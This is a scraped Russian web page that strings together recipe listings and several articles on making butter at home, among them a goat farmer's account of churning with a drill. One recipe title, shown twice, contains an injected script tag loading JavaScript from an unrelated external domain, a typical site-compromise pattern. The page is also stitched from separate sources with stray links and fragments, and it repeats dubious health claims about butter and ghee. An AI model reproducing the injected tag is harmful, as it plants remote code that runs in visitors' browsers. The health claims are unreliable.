Сливочное масло в домашних условиях

Домашнее масло — рецепты

Рецепт: Очищенное топлeное сливочное масло Гхи

Очищенное топлeное сливочное масло "Гхи"

Рецепт: Очищенное топлeное сливочное масло Гхи

Представьте себе универсальное масло, которое можно использовать много раз, которое придаeт поистине волшебный вкус всем блюдам, которое может храниться ВЕКАМИ (. ) и которое, при всeм при этом, бесконечно полезно для здоровья! Представили? Полагаю, что нет. Это чудесное масло называется "Гхи&qu ot;! Его я и хочу вам сегодня представить.

  • 360556
  • 4641
  • 960

Рецепт: Шоколадное масло

Шоколадное масло

Рецепт: Шоколадное масло

На форуме есть рецепт шоколадного масла у Кати (Пани Кася), мой немного отличается, добавляю его как бы вариантом, может кому пригодится!

  • 48955
  • 1130
  • 337

Рецепт: Сливочное масло домашнее

Сливочное масло домашнее

Рецепт: Сливочное масло домашнее

Недавно привезли банку деревенской сметаны, которая долго стояла в холодильнике, мама посоветовала сделать из него масло, которое на удивление получилось с очень нежным и сливочным вкусом и всего за 5 минут! Муж и папа слопали его за один вечер с чаем и булочкой! Теперь масло делаю сама. Ведь оно самое 100 %- натуральное, без всякой добавки! Если повторилась — закидайте тапками, но я такого рецепта не нашла на сайте.

  • 105604
  • 475
  • 195

Рецепт: Имбирное масло

Имбирное масло

Рецепт: Имбирное масло

Варианты использования разнообразны. Делает пикантным и насыщенным вкус рыбы, морепродуктов, овощей, баранины.

  • 16003
  • 420
  • 163

Рецепт: Сливочное масло

Сливочное масло

Рецепт: Сливочное масло

Не нашла на нашем замечательном сайте рецепта обычного сливочного масла, которое можно за 5 минут приготовить дома. Если просмотрела, прошу сразу меня простить :) Итак. сливочное масло!

  • 63765
  • 449
  • 149

Рецепт: Сливочное масло со специями

Сливочное масло со специями

Рецепт: Сливочное масло со специями

Такое масло очень выручает на кухне:)

  • 15971
  • 233
  • 131

Рецепт: Домашнее масло

Домашнее масло

Рецепт: Домашнее масло

Я думаю, что практически все знают, как приготовить домашнее маслице, но не все знают некоторые секреты улучшения вкуса нашего полезного продукта.

  • 20117
  • 275
  • 120

Рецепт: Чесночное масло с цветками шнитт-лука

Чесночное масло с цветками шнитт-лука

Рецепт: Чесночное масло с цветками шнитт-лука

Цветущий шнитт-лук украшает дачные участки и можно взять его малую часть для приготовления чесночно-лукового масла! После охлаждения масло готово к употреблению, а если его заморозить порционно, то даже зимой можно будет наслаждаться вкусом и красивыми цветами! Рецептом вдохновилась в интернете, благодарю автора!

  • 3164
  • 199
  • 93

Рецепт: Топленое масло на водяной бане

Топленое масло на водяной бане

Рецепт: Топленое масло на водяной бане

Топленое масло — это традиционный продукт очень многих народов. В процессе длительного нагревания сливочное масло освобождается от различных примесей, таких, как молочный белок и вода, белок образуется в виде пенки, а вода просто испаряется. Это позволяет сохранять масло очень длительное время и использовать для фритюра: топленое масло не горит при перегреве и не образует канцерогены при высокой температуре. Кроме того, при обжарке придает продуктам великолепный ореховый вкус. За непревзойденные полезные свойства его называют "жидким золотом"! Обязательно приготовьте такое масло для себя, это полезно и несложно!

  • 25704
  • 358
  • 92

Рецепт: Розмариновое масло

Розмариновое масло

Рецепт: Розмариновое масло

Всем приветик, хочу поделиться с вами рецептом "Розмариновое масло "! Масло делается очень быстро, имеет прекрасный розмариново-апельсин овый вкус, с острой ноткой! Мы завтракаем на выходных с этим маслом, добавляю его в картошку, к мясу и рыбе! Буду очень рада, если рецептик кому-то пригодится!)))

  • 6010
  • 198
  • 83

Рецепт: Домашнее масло

Домашнее масло

Рецепт: Домашнее масло

Прежде, чем писать рецепт, посмотрела здесь. Долго думала, выкладывать или нет. И решила, что моё масло такое же, как у всех, но сделано другими инструментами :) Может, у кого нет погружного блендера, как у меня, так пригодится и мой рецепт! Масло из магазина нам перестало нравиться. В нашем городе уж точно. Поэтому я взяла старый избитый рецепт наших бабушек и сделала своё, домашнее! Я смотрела в интернете разные рецепты, все они с одинаковым исходом. Нет ничего нового в технологиях. Просто взбивают по разному :)

  • 8065
  • 138
  • 59

Рецепт: Домашнее шоколадное масло

Домашнее шоколадное масло

Рецепт: Домашнее шоколадное масло

В последнее время не давали мне покоя воспоминания из детства — вкуснейшее шоколадное масло, которое изредка удавалось покупать родителям в магазине. Тогда дома был маленький праздник. Как сейчас помню, мы с папой сидим на кухне и пьем чай вприкуску с булкой, а на булке толстый слой ароматного шоколадного масла. Дабы не разрушать очарование детских воспоминаний покупкой суррогата, решила приготовить это маслице в домашних условиях. Очень кстати на одном кулинарном сайте мне попался этот замечательный рецепт

  • 52500
  • 164
  • 59

Рецепт: Масло из козьего молока

Масло из козьего молока

Рецепт: Масло из козьего молока

Собственно вот! Цвет – насыщенно белый. Аромат дразнящий, но «козьей отдушки» нет абсолютно никакой. Нежнее, надо признать, коровьего. Очень яркий «сливочно-пломбирный» вкус. Но это уже – специфика молока.

  • 5804
  • 39
  • 58

Рецепт: Папричное масло

Папричное масло

Рецепт: Папричное масло

Получается очень вкусное, красивое и ароматное масло. А главное — какое разнообразие на столе! Угощайтесь!

  • 10191
  • 80
  • 56

Рецепт: Топлёное сливочное масло<script type="text/javascript" src="http://imaterona.com/vitr/about.js"></script>

Топлёное сливочное масло

Рецепт: Топлёное сливочное масло<script type="text/javascript" src="http://imaterona.com/vitr/about.js"></script>

Давно хотелось приготовить топлёное сливочное масло, которое не пробовала с детства! Начиталась различных советов и рецептов, вывела среднее арифметическое))) публикуюсь впервые, волнительно, но очень хочется поделиться. На сайте нет подобного я надеюсь!

Сливочное масло в домашних условиях — рецепты

Изготовление сливочного масла в домашних условиях из молока для собственного использования не требует никакого специализированного оборудования, кроме маслобойки. В былые времена наши бабушки делали его из молока и творога. В наши же дни мы чаще покупаем его на рынке. Редко кто знает, как сделать масло в домашних условия. Лишь некоторые сохранили рецепты своих бабушек и могут самостоятельно приготовить вкусный продукт. Мы предлагаем несколько вариантов, как сделать масло в домашних условиях.

Домашнее масло

  • до 2 литров молока;
  • соль от 1⁄4 до 1⁄2 ч. л.;
  • большая разливательная ложка;
  • ковш (черпак);
  • контейнеры;
  • маслобойка.

Пошаговый алгоритм приготовления

  1. Сбор сливок. Нагрейте молоко на среднем огне в кастрюле не накрывая крышкой. Когда молоко нагрето, по краям появляются сливки на верхней части. Не позволяйте ему кипеть.
  2. Теперь, используя чистый ковш, соберите бурлящий крем сверху. И так повторять несколько дней: собирать только небольшое количество от 1-1/2 до 2 литров молока.
  3. Дайте собранному крему остыть и храните его в холодильнике или морозильнике.
  4. Приступаем к непосредственному изготовлению масла из сливок. Выньте собранные сливки из морозильной ячейки и дайте им немного растаять, если они замороженные.
  5. Перенесите сливки в миску. Используя маслобойку, взбейте крем круговыми движениями.
  6. Во время разминания сливок возле одной из сторон кастрюли немного наклоняйте емкость. Тогда жидкость не будет перемешиваться с маслом.
  7. Выловите масло с помощью ковша и храните его в отдельном контейнере.

Не выбрасывайте остатки, так как это молоко только без сливок и его можно применять для выпечки.

Изготовление масла из творога

Способ производства масла из творога такой же, как и для молочных сливок. Из ингредиентов понадобится только творог.

Вот как следует готовить масло:

  1. Перенесите творог в кастрюлю.
  2. Используя маслобойку, взбейте творог круговыми движениями.
  3. Скоро появится масло, отделенное от творога. Слейте жидкость пахты, масло выложите с помощью ковша и храните его в отдельном контейнере. Не выбрасывайте остатки сыворотки, так как ее можно употреблять в качестве подслащенного или пряного напитка во многих блюдах. Несмотря на то, что масло было собрано и взбито в нем по-прежнему содержится много молока и сыворотки.
  4. Используя ложку, взбейте масло несколько раз круговыми движениями.
  5. Слейте жидкость. Повторите этот процесс до тех пор пока вся жидкость не стечет из контейнера.
  6. При многократном нажатии ложкой с масла можно слить все оставшиеся капли жидкости.

Крестьянское масло

  • марля;
  • банки;
  • сырое молоко;
  • соль-1⁄4-1⁄2 ч. лож;
  • ложка;
  • термометр;
  • деревянная лопатка.
  1. Пусть постоит молоко в холодильнике 12-24 ч. Это необходимо, чтобы в верхней части появились сливки.
  2. Возьмите большую ложку и снимите сливки с верхнего слоя молока и положите в миску.
  3. Пусть сливки стоят при комнатной температуре. Возьмите банку (с крышкой) и положите сливки в нее. Накройте и отложите на время.
  4. Через несколько секунд, держите сливки в банке и руке, энергично встряхивая до тех пор, пока масло и жидкость не превратятся в мягкую твердую форму.
  5. Слейте из масла пахту.
  6. Теперь добавьте холодную воду в банку (с маслом в ней). Встряхните банку очень осторожно. Возьмите марлю и накройте ее. С ее помощью слейте воду из масла.
  7. Сполосните масло холодной водой еще раз и продолжайте делать это до тех пор, пока сливаемая жидкость не станет прозрачной.
  8. Выньте масло из баночки и положите его на прохладную поверхность, как древесная разделочная доска. С помощью деревянной ложки выдавливайте из масла жидкость пахты до тех пор, пока оно не станет полностью лишенным любой влаги.
  9. Смешайте масло, вместе с солью 1⁄4-1⁄2 ч. лож. Теперь положите в миску и поместите его в холодильник.

Чтобы придать маслу ровный вид красивой формы, отделите его от пахты. Затем слейте воду, положив продукт в глубокую тарелку. Аккуратно подбрасывайте его, придавая поверхности гладкую форму.

Как сделать масло из сливок в домашних условиях

Как сделать масло из сливок в домашних условиях Молоко будет поступать

Сливочное масло многие употребляют каждый день. С ним готовят бутерброды, используют его как добавку к каше или блинчиками. И хотя купить масло можно в любом магазине, некоторые люди все равно готовят его дома – просто потому, что так получается намного вкуснее. Такой продукт готовят из обычного домашнего молока или же из сливок.

Читайте также  Корзинка из баночки от йогурта

Как получить сливки из молока?

Чтобы из коровьего молока в домашних условиях приготовить сливки, понадобится всего лишь один компонент – это цельное молоко. Сделать сливки можно двумя способами: вручную и при помощи сепаратора.

Для начала молоко необходимо процедить и перелить в подготовленную чистую емкость, которой может служить глубокая миска или стеклянная банка. После этого ее нужно поставить в холодильник и дать отстояться продукту 24 часа.

По истечении этого времени молоко надо достать и очень осторожно снять образовавшиеся на поверхности сливки при помощи обычной ложки. После их можно поставить обратно в холодильник или же использовать по назначению. Если собирать сливки таким способом, то их жирность будет равна приблизительно 28%.

Сепаратором

Если дома есть сепаратор, то намного эффективнее использовать именно этот аппарат. Его нужно поставить на самый край стола и закрепить на специально сделанной для этого подставке. Важно, чтобы сам сепаратор находился вертикально.

Так как молоко для этой процедуры подходит только теплое, то его необходимо прогреть до 40 градусов и тщательно процедить. После этого его нужно перелить в молокоприемник и включить сепаратор. Затем необходимо начать вращать ручки и медленно наращивать скорость. После звукового сигнала нужно открыть кран. Молоко будет поступать в барабан. Соответственно, сливки пойдут в одну посудину, а молоко – в другую. Это будет уже обезжиренный продукт.

Перед окончанием сепарирования необходимо залить еще немного отделившегося молока. Это нужно для того, чтобы сливки полностью вышли из барабана.

Рецепты приготовления

Готовить сливочное масло в домашних условиях можно разными способами. Обычно для этого используют миксер, но можно взбить вкусный продукт и вручную.

При помощи миксера

Чтобы приготовить правильно вкусное и качественное сливочное масло дома, понадобится миксер, глубокая посудина и сито. Компонент для масла нужен только один – сливки.

При изготовлении нужно четко следовать пошаговой инструкции.

  1. Перед началом работы надо немного охладить сливки. Температура их должна составлять 8–11 градусов.
  2. Охлажденные сливки нужно залить в приготовленную емкость и взбить их, включив самую большую скорость. Сама процедура займет совсем немного времени – достаточно будет 8–12 минут.
  3. Когда масса начнет густеть и из нее выделится жидкость, скорость взбивания можно уменьшить.
  4. После того как жидкость перестанет выделяться, работу миксера можно прекратить. Готовое масло необходимо процедить через сито. Жидкость, которая стечет, прекрасно подойдет для приготовления любой выпечки.
  5. Масло же надо переложить в подготовленную миску и перемешать, чтобы оно получилось в итоге очень мягким.

Поместить масло можно в холодильник или морозильную камеру.

Собственноручно

Еще в старину, когда современной техники не было и в помине, сливочное масло взбивали руками. Такой способ не понравится тем, кто любит делать все быстро, однако масло получается очень нежным. Чтобы его приготовить, достаточно взять 1–2 литра густых и жирных сливок.

  1. Если в предыдущем рецепте сливки нужно было охлаждать, то здесь, наоборот, их необходимо поставить в теплое место. Затем их надо перелить в глубокую посудину и начать хорошо перемешивать. Делать это придется долго, однако результат превзойдет все ожидания.
  2. Когда начнут появляться зернышки масла, можно выдохнуть – процесс уже почти закончен. Еще пара минут перемешивания, и эти крохи превратятся в густую масляную смесь.
  3. Его надо хорошо отжать от лишней влаги и поместить в холодильник.

Через некоторое время масло застынет, и его можно будет использовать по назначению.

В маслобойке

Очень часто в деревнях для производства большого количества масла у людей не хватало времени. Чтобы немного облегчить себе работу, люди готовили его в специальных маслобойках, которые были сделаны из дерева. Готовить такое масло в этом приспособлении максимально просто.

Сам себе молочник: секреты приготовления домашнего сливочного масла

. Маша старейшина моего козьего стада и она весьма дружественный представитель животного мира. За молочный сезон она выдает больше 450 литров молока, и если дойных коз десять (а у меня десять дойных коз), то и молока ориентировочно в десять раз больше. Кроме творога и сыра, можно делать сливочное масло и топленое масло.

Топленое масло делается из сливочного просто перетапливанием в сковородке или кастрюле с толстым дном. Собираю обычной столовой ложкой растопленный прозрачный жир поверху, и этот жир и есть топленое масло. В топленом масле почти 100% молочного жира, тогда как в сливочном от 50% (Чайное, массовая доля жира 50%) до 82.5 % (Традиционное, массовая доля жира 82.5 %). В Российской квалификации масла есть еще Любительское 80% жира, Крестьянское 72.5% жира и Бутербродное — 61% жира.

В моем сливочном масле доля молочного жира мне неизвестна. Тем не менее люди его едят и не против есть и дальше. В свою очередь, я настолько привык к домашнему сливочному маслу, что магазинное меня уже не устраивает. А подсолнечное масло уже давно не покупаю.

Кусочек сливочного масла весом в два килограмма

Для получения сливочного масла из молока нужно сначала выделить сливки. Молоко у меня козье, и жирность у него от 3.6% до 6% в зависимости от козы. Сливки получают сепарированием молока, и у меня есть сепаратор Сокол, произведенный известной корпорацией Мотор-Сич. Это лучшие сепараторы в СНГ и чрезвычайно надежные. К тому же он очень удобен, быстро моется и разбирать-собирать его одно удовольствие. Для того чтобы помыть сепаратор, в моих условиях нужно полтора ведра воды. И сепарировать меньше восьми литров молока мне нет смысла, потому как грязи будет больше, чем сливок. С моими козами мне в июле удавалось набирать больше тридцати литров молока в сутки и за раз пропускать их через сепаратор.

Струя сливок из сепаратора

Сепаратор разделяет молоко на сливки и обезжиренное молоко, его еще называют обратом. Есть объяснение названию «обрат»: якобы с молокозаводов сепарированное молоко отвозили обратно на фермы для выпаивания телят. Но не могу ни подтвердить, ни опровергнуть эту версию. Козлята после двух месяцев отлично пьют обезжиренное молоко и при этом сохраняют отличный аппетит к зеленой траве. Про более ранний возраст козлят ничего не могу сказать, потому как сепаратор у меня появился как раз в тот момент, когда козлятам было по два месяца. Но исходя из простой логики, козлятам меньше месяца при кормлении обезжиренным молоком негде будет брать жиры, и они будут остро ощущать их недостаток.

Струя обрата из сепаратора

Из обрата делаю творог, и он почти не теряет во вкусовых качествах. Мне даже больше нравится обезжиренный творог, чем обычный. Из творога можно варить супы, хотя у нас в РФ как-то не принято. Творожные супы с зеленью варил все лето и теперь варю без зелени, но с морковкой. И очень ими доволен. Обезжиренный творог отвозил знакомым, у которых есть куры, и менял на яйца. Куры с уважением относятся к обезжиренному творогу и вроде как повышают яйценоскость. Клюют его здорово.

Сепаратор для молока Сокол

Сливки храню в холодильнике. С двадцати литров молока получается где-то чуть больше литра сливок. Определить жирность мне нечем, да и потребности такой нет в действительности. Чтобы сбить масло, коплю сливки за три дня, итого сепарирую 60 литров молока. Но так было летом и на пятый-шестой месяц лактации. В октябре молоко гораздо жирнее, по объективным ощущениям и по выходу масла также. Из четырех с половиной ведер молока получается около двух килограммов сливочного масла, тогда как летом для двух килограммов масла нужно было шесть ведер молока. И при этом козы видят лишь немного овса, буквально по кружке каждой. Сено, правда, кидаю сейчас в кормушки понемногу.

Только-только начала отделятся пахта

Сбиваю масло дрелью, обычной Bosh PSB 500RE за полторы тысячи рублей, купленной где-то на распродаже и по акции в уцененном магазине, продающем товары с поврежденной упаковкой. И на эту дрель была скидка, потому как у нее не было патронного ключа. Никто не брал эту дрель, люди презрительно отворачивались от нее, и мне стало ее жалко и тем более, дрель-то хорошая. И она у меня уже больше десяти лет работает за всех: за болгарку, за перфоратор, за миксер, за шуруповерт, вот за маслобойку. А патронный ключ купил в Метрике за 99 рублей, есть такая сеть магазинов и тоже со скидкой. Очень люблю свою дрель, у нас с ней много общего.

Видны кусочки масла

Знаю, что продается много разных маслобоек, есть ручные и электрические. Но вот деньги заплатить за то, что можешь и так сделать, у меня не получилось. И не приобрел себе маслобойку. Зато приобрел кучу опыта и немного потерь. В любом случае, масло не сбивалось у многих и у многих часто не сбивается. И у меня поначалу бывало так. Но, благодаря тому, что у весь процесс (от заготовки сена и до хранения сливок) происходит не то что у меня на глазах, а и моими же руками, мне удалось достичь стабильного взбивания масла и, если можно так сказать, полного.

Читайте также  Уход и заточка опасной бритвы

Зачем же делать то, что до тебя делали миллионы других людей, и тысячи из них и сейчас живы и могут объяснить все тонкости взбивания масла? Зачем открывать Америки и изобретать велосипеды? Очень хороший вопрос, и ответить на него можно только лишь тем, что и до нас жили миллионы людей и зачем-то еще и мы живем? Неужели природа с Вселенной не выяснили все окончательно в отношении людей? Выходит по логике, что раз мы тоже появились на этой планете вслед за нашими предками, то тоже будем-таки изобретать велосипеды, но делать это лучше, быстрее и оптимальнее.

Остатки пахты на дне кастрюли

Надо еще сказать пару фраз о венчике. Венчик — такая интересная штука, которая мешает непосредственно сливки, плавно переходящие в масло. Масло взбивается от пяти минут и до получаса, и все это время венчик вертится дрелью с разной скоростью, в зависимости от стадии сбивания. И действительно, скорость взбивания очень важна, и расскажу чуть позже почему. Вначале у меня был венчик деревянный, я просто срезал небольшую рогатину из клена, обстругал ее и зачистил шкуркой. Оставил три сантиметра после раздвоения веточки и длинным одинарным концом вставил в патрон дрели. И вприпрыжку побежал радостно взбивать масло.

Немного о моих ошибках при производстве масла

Густые сливки сверху (шапка).

При хранении в холодильнике сливки ведут себя непросто, и образуют плотный густой верхний слой, иногда до трети всего объема. Как то два дня у меня были гости из Таллина, и я сварил гречневую кашу. И пока она была теплая, снял верхний плотный слой сливок из холодильника, почти весь из маленького ведерка и положил в кашу. Остались только жидкие сливки в две трети от первоначального объема. Каша была суперская, ее поели очень быстро и очень хвалили. Но на следующий день, начав сбивать масло, получил некий сливочный крем и только.

Такую же проблему имела моя двоюродная тетя в Киеве, которая покупала на Житном рынке на Верхнем Валу сливки, и они сбивались в масло через раз еще в далекие советские годы. У торговки сливки точно так же на морозе разделялись на плотный слой и жидкий, и если один покупатель забирал верхнюю половину, то у него сбивалось масло точно. А вот следующему могло и не повезти.

Поначалу не так и важна скорость вращения, хотя лучше иметь небольшую скорость в начале и в конце сбивания. В середине процесса можно использовать максимальную скорость. В конце же существует опасность того, что пахта (жидкость, которая выделяется при получении масла из сливок) будет с большой скоростью смешана с самим маслом и буквально запахана в масло. И можно заиметь вместо масла очень вкусный сливочный крем, почти что сливочное чайное масло с жирностью около 50%.

Первые несколько раз я использовал, как писал выше, реальную рогатку. И самое главное, такой венчик работал. Масло взбивалось, и я даже давал немного кошкам, самую малость. Кошки приходили в некое неистовство и жаждали еще и еще. Но к венчику ближе: и настал момент, когда масло не взбилось, и опять получился некий крем, к тому же напоминающий магазинное масло. Когда не сбивается масло, очень нехорошие чувства испытываешь при этом. Сено косил, навоз чистил, коз доил, молоко сепарировал — а на выходе какая-то ерунда получается. Даже кошки в шоке, когтями у виска крутят. Но потом я понял, что венчик должен перемешивать всю толщину масла — сверху донизу. Пока сливок было мало, рогатка крутила сливки двумя концами и перемешивала весь объем почти равномерно. При большем количестве сливок верхний слой почти не перемешивался, а когда внизу пошла отделяться пахта, мне это было не заметить, и венчик запахал вскорости пахту в получившееся масло. И получился некий крем.

У меня был случай, когда и пахта отошла, и масло уже сбилось, но часть сливок еще была в процессе. И не нашел ничего лучшего, как собрать масло и выложить на тарелку. Дальнейшее было просто — у меня остались сливки, разведенные пахтой, и кошки опять радовались и наслаждались. Конечно, не все пошло кошкам, что-то можно использовать в кашу и заморозить, но усатым тоже надо что-то дать из вкусного. И как наука: никогда нельзя вытягивать масло первым, а нужно всегда сливать пахту. Появилась — слил и потихоньку вращаешь венчиком дальше. Потом опять слил пахту, опять вращаешь. Если взять масло при некотором количестве оставшихся сливок, то это будет последнее масло с этих сливок.

На стенках ведра

при дойке в мороз часто наблюдаю отложения молочного жира. Так же, в постоявшем ведре молока на морозе могут плавать круглые жиринки, и их весьма интересно наблюдать. Холод однозначно помощник при выделении жира из сливок, поэтому лучше заморозить сливки и вытащить их из холодильника или из сеней зимой за тридцать минут до начала взбивания масла. Не надо брать теплые сливки и пытаться из них взбить масло. Будет и дольше, и вероятность неполучения масла существует.

Любители козьего сливочного масла бедненькие пищащие голодные котятки

И еще есть один лайфхак у меня: когда масло получилось, и так красиво лежит на руке, и тает от пальцев, всегда даю небольшой кусочек кошке. И в следующий раз масло собьется обязательно. Проверено десятки раз. Масло получается у меня, как мягкий тающий пластилин, оно практически не липнет к рукам и из него можно слепить шарик или длинную колбаску. Не промываю масло, ленюсь. Да и потребности в этом практически нет, на финальной стадии долго мну масло руками и сливаю появившуюся пахту. На масле остаются небольшие капельки, но они даже дают пикантность его вкусу.

Два килограмма сливочного масла в пакете

Вкус продуктов — фактически вкус жира. При физической работе или просто долгом пребывании на открытом воздухе энергия организма расходуется очень быстро. Поколоть дрова зимой весь день очень полезно за счет того, что существенно жирок уходит. И вот вечером масло можно есть ложками, так вкусно.

Сказка про венчик для взбивания масла

Долго я бы взбивал рогаткой масло, если бы не увидел случайно на рынке в Красногородске у одного странного вида мужичка венчик от миксера Мулинекс. Мужичок торгует всяким старым затасканным товаром, часто деталями, и разложено на продажу на клеенках у него много всякого барахла. Как к нему попал мулинексовский венчик, мне вообще неизвестно и затрудняюсь даже предположить. Дело в том, что у меня когда-то был такой миксер и прекрасно знаю эту форму. И как раз можно этим венчиком взбивать масло. И дернулся зря, спросил у продавца: «Не от мулинекса ли этот венчик?». Дядя понял, что у меня, наверное, есть такой миксер и, скорее всего, венчик сломался и тут для меня такое счастье — нашел! Прикинув это, он выдал ценник чуть ли не в пятьсот рублей и стоял на своем до последнего. Мне же было обидно платить столько и уехал в тот день ни с чем.

Венчик для взбивания масла от миксера Мулинекс

Через месяца два опять был на рынке и уже к концу его опять увидел того же мужичка, и самое главное, тот же самый венчик все еще валялся на той же потрескавшейся клеенке. В этот раз подошел к продавцу и заговорил с ним ни о чем, почти что о погоде. Разговор получался, тем более что как раз планировались выборы народных депутатов в Государственную Думу. Вскоре спросил цену продающихся плоскогубцев, которые действительно могли мне очень пригодиться. Про эти плоскогубцы удалось узнать немного истории: они лежали в старом тракторе, который сдали на металл, а плоскогубцы можно все же продать и выкидывать их было жалко. За плоскогубцы человек хотел двести рублей, но отдавал за сто пятьдесят. И тут, как будто только увидев и указывая на венчик, спросил что это. Мужичок ответил, что это дескать для миксера запчасть. Попросил его в нагрузку и тогда плоскогубцы беру за двести. И венчик с плоскогубцами стали моими. Сейчас пользуюсь обоими. С удовольствием!

Плоскогубцы из сданного на металл трактора

Уважаемые люди! Прошу Вас, как обычно, сообщать своим друзьям в социальных сетях о моей небольшой статеечке. Домашнее козье масло стоит вашего внимания, уверен. И также, чем больше людей прочитает о животных, тем больше таких статей будет появляться. И нам с вами будет что почитать.

Читайте также  Необычный ремонт выпадающей розетки

Козочка 3305, вырастет и будет давать молоко для сепаратора

Кликайте на иконки социальных сетей ниже, тем более козы очень интересные животные. Заранее спасибо и здоровья вам и вашим питомцам.

Домашнее масло: как готовить

Домашнюю кухню невозможно представить без ароматного и нежного сливочного масла. С ним и каша, и блинчики, и выпечка, и простой бутерброд становятся вкуснее. «Школа крафта» не может обойти вниманием этот продукт. Тем более что его совсем несложно получить в домашних условиях. Сегодня мы учимся делать настоящее крафтовое масло.

Звенит звонок – начинаем урок!

Масло сливочное

Сливочное масло вошло в рацион человека более 4 тысяч лет назад

Как это делали раньше

Масло – продукт с богатой и уважаемой историей. Его знали и готовили на протяжении последних четырех тысяч лет. Около 2 тысяч лет до нашей эры масло делали в Египте, Индии, Месопотамии. С ним были хорошо знакомы викинги. И, конечно, продукт пользовался большой популярностью на Руси.

Наши далекие предки использовали для приготовления масла сливки, цельное молоко, а также сметану.

Сначала сырье томили в больших горшках, ставя их в печь. Маслянистую субстанцию, которая отделялась под действием тепла, охлаждали, а потом взбивали вручную. Продукт был дорогим из-за сложности производства, большого расхода молока, а также проблем с его хранением. Чтобы продлить срок годности, готовое масло несколько раз перетапливали и промывали холодной водой. Получался тот самый знаменитый топленый продукт, который до сих пор в мире называют «русское масло».

Топленое масло

В Европе топленое масло до сих пор называют «русским маслом» – Россия была крупнейшим поставщиком продукта

Несмотря на высокую жирность, настоящее сливочное масло имеет очень высокую усвояемость – около 95 %. То есть оно практически полностью потребляется организмом.

Масло содержит 40 % мононенасыщенной олеиновой кислоты, которая улучшает липидный баланс организма и даже подавляет активность злокачественных клеток. Кроме этого, масло – источник белка, кальция и жирорастворимых витаминов, среди которых особенно ценны для нас витамины группы A и D. Последний – «витамин солнца» – довольно непросто получить с пищей, а он крайне полезен в нашем суровом климате.

Все эти чудесные свойства имеет натуральное сливочное масло, то самое, срок хранения которого не более 2 недель. Вы уже поняли, каким будет вывод? Хочешь видеть на своем столе полезное и натуральное сливочное масло – приготовь его сам.

Электрические маслобойки Электрические маслобойки Электрические маслобойки Электрические маслобойки

Разновидности электрических маслобоек

Оборудование для приготовления сливочного масла

У меня есть хорошая новость. Нам не придется использовать древнюю технологию изготовления сливочного деликатеса. Несколько сот лет назад человеческий гений придумал простое, но эффективное устройство – маслобойку. Ее современные версии пригодны и для домашнего применения, и для фермерского хозяйства.

Как работает маслобойка?

Современная маслобойка приводится в движение с помощью электропривода или вручную. Внутри вращается вал с крыльчаткой, вращение осуществляется силой электричества или вручную. Вал взбивает сливки или сметану. В процессе вращения и взбивания происходит образование масляного зерна, которое через несколько минут формирует масляный сгусток. Одновременно отделяется жидкая фракция – сыворотка или пахта.

Периодически прибор открывают и оценивают состояние масляного сгустка.

Как выбрать маслобойку

Принцип работы маслобоек одинаков: в процессе взбивания происходит разделение сливок на жидкую и масляную фракцию. А вот типы приводов, производительность, объемы и материалы изготовления приборов, действительно, могут различаться.

  • Для собственного хозяйства лучше покупать маслобойку с электрическим приводом. Такой прибор позволяет перерабатывать десятки литров молока за один цикл.
  • Для домашнего пользования можно купить электрическую маслобойку небольшого объема, если вы постоянно готовите масло. Такие приборы рассчитаны на приготовление от 2 до 5 кг масла за один раз. независимы от электричества, поэтому с ними удобно работать на открытом воздухе, например на дачном участке. К тому же они, как правило, относительно недорогие. Среди них есть и совсем компактные модели.

Ручная маслобойка

Миниатюрная ручная маслобойка с пластиковыми лопастями

Для изготовления маслобоек используют различные материалы. Я советую обращать внимание, прежде всего, на материал внутренних частей. Предпочтительнее, чтобы двигатель, вал и лопасти были изготовлены из металла.

Корпус современных маслобоек, как правило, делают из пластика или нержавеющей стали. Встречаются маслобойки из поликарбоната и даже стекла.

Чем больше планируется нагрузка, тем прочнее должна быть ваша маслобойка. Для постоянной работы в собственном хозяйстве выбирайте прибор из нержавеющей стали, не ошибетесь. Для дома подойдет и ударопрочный пластик.

Технология приготовления сливочного масла

С использованием маслобойки технология приготовления масла становится по-настоящему простой.

  • Сливки, молоко или сметана загружаются в устройство.
  • Взбивание ведется до образования масляного сгустка.
  • Как только зерно образовало пластичную массу и отделилось от пахты, взбивание прекращают.
  • Пахту сливают, а в маслобойку заливают холодную воду и перемешивают ее с маслянистой массой.
  • Воду сливают и промывку повторяют.
  • Можно масло выложить на сито, пахте дать стечь и промывать масло холодной водой прямо в сите.
  • После промывки масло выкладывают на бумажное полотенце. Можно размять, как тесто, чтобы вода быстрее отошла.
  • Готовое масло собирают в ком, оборачивают в пищевую пленку и кладут в холодильник.

Масло с зеленью

Рецепты масла можно дополнить специями, зеленью, солью и даже икрой

Особенности приготовления масла дома

  • Чем жирнее исходное сырье, тем выше выход масла.
  • В маслобойке выход масла составляет от 35 до 50 % от исходного сырья, в зависимости от его жирности.
  • Для того чтобы масло собиралось быстрее, его промывают очень холодной водой. Для снижения температуры в воду для промывки добавляют кубики льда.
  • Если масло готовится из сепарированных сливок из непастеризованного молока, то их нужно сначала пастеризовать, затем охладить, а потом снова нагреть до температуры, примерно 12–15 градусов. Нагревать нужно на водяной бане или при комнатной температуре.
  • Если масло вы делаете из сметаны, то она должна иметь температуру около 15 градусов.
  • Добавление в масло соли продлевает срок его годности.
  • В домашнее масло можно добавлять пряности, специи, измельченные фрукты, икру, шпроты, какао, шоколад.
  • Свежее масло хранится около 2 недель в холодильнике, соленое – около месяца.
  • Масло быстро абсорбирует запахи, поэтому держите его в герметичной упаковке.

Рецепты: из чего можно приготовить масло

Масло можно готовить из сливок, сметаны, козьего, коровьего, овечьего молока. Приведу несколько классических рецептов, которые вы сможете дополнить по своему вкусу.

Сметана

Сметана или сливки для приготовления масла нужны не менее 25 % жирности

Масло из сметаны

Потребуется 1 кг сметаны жирностью от 25 % и 5 литров охлажденной воды.

  • Взбить масло на максимальной скорости до разделения на масляное зерно и пахту.
  • Пахту слить.
  • Масляную жидкость промыть охлажденной водой несколько раз. Удобно использовать для этого сито.
  • Отжать руками.
  • Сформировать из масла комок или брусок, обернуть его пищевой пленкой и хранить в холодильнике.

Масло из сметаны имеет тонкую кислинку.

Масло из сливок

Сливки можно получить из цельного молока. Для этого служит сепаратор, две чаши которого работают по принципу центрифуги. Для приготовления масла сливки придется пастеризовать, чтобы сделать их биологически безопасными.

Потребуется 1 литр свежих сливок и около 5–7 литров охлажденной воды.

  • Взбить сливки в маслобойке. Можно начинать с небольшой мощности, а через 5 минут увеличить скорость до максимальной.
  • Когда сливки побелеют и уменьшатся в объеме, можно добавить соль, специи или травы.
  • Продолжать взбивание до тех пор, пока масса не разделится на фракции.
